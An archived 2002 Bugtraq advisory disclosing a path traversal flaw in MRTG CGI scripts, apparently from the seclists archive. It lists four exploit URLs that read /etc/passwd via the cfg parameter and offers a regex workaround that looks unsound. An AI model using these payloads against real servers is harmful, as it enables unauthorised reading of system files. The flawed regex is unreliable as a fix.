Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

new advisory
From: "UkR-XblP?" <cuctema () ok ru>
Date: Sat, 02 Feb 2002 04:47:29 +0300
---=== UkR Security Team advisory ===--- Name : MRTG CGI script "show files" Vulnerability About : The Multi Router Traffic Grapher (MRTG) is a tool to monitor the traffic load on network-links. MRTG generates HTML pages containing GIF images which provide a LIVE visual representation of this traffic 
Product vendor: MRTG / http://www.mrtg.org
Problem : Problem lyes in incorrect validation of user submitted -by-browser information, that can show first string of any file of the system where script installed. Workaround : this will help in somewhat : $input =~ s/[(\.\.)|\/]//g; 
Author        : UkR-XblP / UkR security team
Exploit : http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd 
                http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
                http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
                http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
---
Professional hosting for everyone - http://www.host.ru

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]